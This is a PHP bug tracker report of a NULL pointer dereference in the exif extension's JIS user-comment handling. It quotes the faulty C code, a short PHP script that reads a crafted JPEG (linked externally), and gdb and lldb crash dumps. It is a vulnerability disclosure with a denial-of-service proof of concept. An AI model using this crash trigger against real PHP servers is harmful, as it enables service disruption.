|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2016-07-19 03:11 UTC] nguyenvuhoang199321 at gmail dot com
Description:
------------
There is a bug occur in exif_process_user_comment when trying to encode JIS string.
```
else if (!memcmp(szValuePtr, "JIS\0\0\0\0\0", 8)) {
/* JIS should be tanslated to MB or we leave it to the user - leave it to the user */
*pszEncoding = estrdup((const char*)szValuePtr);
szValuePtr = szValuePtr+8;
ByteCount -= 8;
/* XXX this will fail again if encoding_converter returns on error something different than SIZE_MAX */
if (zend_multibyte_encoding_converter(
(unsigned char**)pszInfoPtr,
&len,
(unsigned char*)szValuePtr,
ByteCount,
zend_multibyte_fetch_encoding(ImageInfo->encode_jis),
zend_multibyte_fetch_encoding(ImageInfo->motorola_intel ? ImageInfo->decode_jis_be : ImageInfo->decode_jis_le)
) == (size_t)-1) {
len = exif_process_string_raw(pszInfoPtr, szValuePtr, ByteCount);
}
return len;
```
As you can see at function call zend_multibyte_fetch_encoding(ImageInfo->encode_jis). At PHP_INI_BEGIN encode_jis was set at empty string so that the result of this call above return NULL and then pass to zend_multibyte_encoding_converter. If this php version is compiled with *mbstring*, this NULL pointer is passed to mbfl_buffer_converter_new2 through *to* pointer.
```
mbfl_buffer_converter_new2(
const mbfl_encoding *from,
const mbfl_encoding *to,
int buf_initsz)
{
******SNIP********
/* initialize */
convd->from = from;
convd->to = to;
/* create convert filter */
convd->filter1 = NULL;
convd->filter2 = NULL;
if (mbfl_convert_filter_get_vtbl(convd->from->no_encoding, convd->to->no_encoding) != NULL) {
******SNIP********
```
Because of none checking 2 pointers *from* and *to* so NULL pointer is passed directly to convd->to and result is the crash when calling mbfl_convert_filter_get_vtbl.
Here crash jpeg file : https://drive.google.com/file/d/0B0D1DYQpkA9URnRROVdLdG5jdFE/view?usp=sharing
This bug also works on Mac OS X and Windows.
Test script:
---------------
<?php
$exif = exif_read_data('null.jpg');
var_dump($exif);
?>
Expected result:
----------------
~/Sources_Ext/audit ยป ./php exif.php
[1] 19270 segmentation fault (core dumped) ./php exif.php
Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x1234de0 --> 0x2e ('.')
RCX: 0xd ('\r')
RDX: 0x0
RSI: 0x7ffff3e585a0 --> 0x0
RDI: 0x7ffff3e00040 --> 0x0
RBP: 0x7fffffffa760 --> 0x7fffffffa7f0 --> 0x7fffffffa830 --> 0x7fffffffa8a0 --> 0x7fffffffa9d0 --> 0x7fffffffaa30 --> 0x7fffffffab60 --> 0x7fffffffabc0 --> 0x7fffffffac00 --> 0x7fffffffac30 --> 0x7fffffffacd0 --> 0x7fffffffad10 --> 0x7fffffffadf0 --> 0x7fffffffb0d0 --> 0x7fffffffb100 --> 0x7fffffffb130 --> 0x7fffffffb170 --> 0x7fffffffb280 --> 0x7fffffffd580 --> 0x7fffffffe900 --> 0x7fffffffea50 --> 0xa15f90 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffa730 --> 0x7ffff3e70168 --> 0x7fff0053494a
RIP: 0x6af72d (<mbfl_buffer_converter_new2+115>: mov edx,DWORD PTR [rax])
R8 : 0x276
R9 : 0x0
R10: 0x9 ('\t')
R11: 0x7ffff67e2730 --> 0xfffda400fffda12f
R12: 0x42c170 (<_start>: xor ebp,ebp)
R13: 0x7fffffffeb30 --> 0x2
R14: 0x7ffff3e14030 --> 0x7ffff3e5fb80 --> 0x9a28f2 (<ZEND_DO_ICALL_SPEC_HANDLER>: push rbp)
R15: 0x7ffff3e5fb80 --> 0x9a28f2 (<ZEND_DO_ICALL_SPEC_HANDLER>: push rbp)
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x6af71d <mbfl_buffer_converter_new2+99>: mov QWORD PTR [rax+0x8],0x0
0x6af725 <mbfl_buffer_converter_new2+107>: mov rax,QWORD PTR [rbp-0x8]
0x6af729 <mbfl_buffer_converter_new2+111>: mov rax,QWORD PTR [rax+0x30]
=> 0x6af72d <mbfl_buffer_converter_new2+115>: mov edx,DWORD PTR [rax]
0x6af72f <mbfl_buffer_converter_new2+117>: mov rax,QWORD PTR [rbp-0x8]
0x6af733 <mbfl_buffer_converter_new2+121>: mov rax,QWORD PTR [rax+0x28]
0x6af737 <mbfl_buffer_converter_new2+125>: mov eax,DWORD PTR [rax]
0x6af739 <mbfl_buffer_converter_new2+127>: mov esi,edx
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa730 --> 0x7ffff3e70168 --> 0x7fff0053494a
0008| 0x7fffffffa738 --> 0xa0f3e00040
0016| 0x7fffffffa740 --> 0x0
0024| 0x7fffffffa748 --> 0x1234de0 --> 0x2e ('.')
0032| 0x7fffffffa750 --> 0x70168
0040| 0x7fffffffa758 --> 0x7ffff3e585a0 --> 0x0
0048| 0x7fffffffa760 --> 0x7fffffffa7f0 --> 0x7fffffffa830 --> 0x7fffffffa8a0 --> 0x7fffffffa9d0 --> 0x7fffffffaa30 --> 0x7fffffffab60 --> 0x7fffffffabc0 --> 0x7fffffffac00 --> 0x7fffffffac30 --> 0x7fffffffacd0 --> 0x7fffffffad10 --> 0x7fffffffadf0 --> 0x7fffffffb0d0 --> 0x7fffffffb100 --> 0x7fffffffb130 --> 0x7fffffffb170 --> 0x7fffffffb280 --> 0x7fffffffd580 --> 0x7fffffffe900 --> 0x7fffffffea50 --> 0xa15f90 (<__libc_csu_init>: push r15)
0056| 0x7fffffffa768 --> 0x6b8e38 (<php_mb_zend_encoding_converter+128>: mov QWORD PTR [rbp-0x48],rax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000006af72d in mbfl_buffer_converter_new2 (from=0x1234de0 <mbfl_encoding_jis>,
to=0x0, buf_initsz=0xa0)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/mbstring/libmbfl/mbfl/mbfilter.c:158
158 if (mbfl_convert_filter_get_vtbl(convd->from->no_encoding, convd->to->no_encoding) != NULL) {
gdb-peda$ bt
#0 0x00000000006af72d in mbfl_buffer_converter_new2 (
from=0x1234de0 <mbfl_encoding_jis>, to=0x0, buf_initsz=0xa0)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/mbstring/libmbfl/mbfl/mbfilter.c:158
#1 0x00000000006b8e38 in php_mb_zend_encoding_converter (to=0x7fffffffaec8,
to_length=0x7fffffffa878, from=0x7ffff3e71388 'A' <repeats 160 times>,
from_length=0xa0, encoding_to=0x0, encoding_from=0x1234de0 <mbfl_encoding_jis>)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/mbstring/mbstring.c:935
#2 0x0000000000969647 in zend_multibyte_encoding_converter (to=0x7fffffffaec8,
to_length=0x7fffffffa878, from=0x7ffff3e71388 'A' <repeats 160 times>,
from_length=0xa0, encoding_to=0x0, encoding_from=0x1234de0 <mbfl_encoding_jis>)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/Zend/zend_multibyte.c:150
#3 0x0000000000613880 in exif_process_user_comment (ImageInfo=0x7fffffffae50,
pszInfoPtr=0x7fffffffaec8, pszEncoding=0x7fffffffaed8,
szValuePtr=0x7ffff3e71388 'A' <repeats 160 times>, ByteCount=0xa0)
at /home/vagrant/Sources_Ext/audit/src/php7.0-7.0.4/ext/exif/exif.c:2649
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Tue Oct 28 10:00:01 2025 UTC |
Here the crash in php (5.5.34 is default installed on mac os x 10.11.5) ``` (lldb) r exif.php Process 32368 launched: './php_mac' (x86_64) Process 32368 stopped * thread #1: tid = 0x4bacc5, 0x000000010017f8b4 php_mac`mbfl_buffer_converter_new2 + 78, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0) frame #0: 0x000000010017f8b4 php_mac`mbfl_buffer_converter_new2 + 78 php_mac`mbfl_buffer_converter_new2: -> 0x10017f8b4 <+78>: mov esi, dword ptr [r15] 0x10017f8b7 <+81>: call 0x100183610 ; mbfl_convert_filter_get_vtbl 0x10017f8bc <+86>: test rax, rax 0x10017f8bf <+89>: je 0x10017f8e7 ; <+129> (lldb) register read General Purpose Registers: rax = 0x0000000000000000 rbx = 0x0000000101c65b98 rcx = 0x0000000000000009 rdx = 0x00000000ffffffff rdi = 0x000000000000002e rsi = 0x0000000000000038 rbp = 0x00007fff5fbfe120 rsp = 0x00007fff5fbfe100 r8 = 0x0000000000000000 r9 = 0x0000000100936780 php_mac.__DATA.__const + 180352 r10 = 0x0000000101c66110 r11 = 0x00000000000000b8 r12 = 0x0000000100936780 php_mac.__DATA.__const + 180352 r13 = 0x00000000000000a0 r14 = 0x00000000000000a0 r15 = 0x0000000000000000 rip = 0x000000010017f8b4 php_mac`mbfl_buffer_converter_new2 + 78 rflags = 0x0000000000010202 cs = 0x000000000000002b fs = 0x0000000000000000 gs = 0x0000000000000000 ```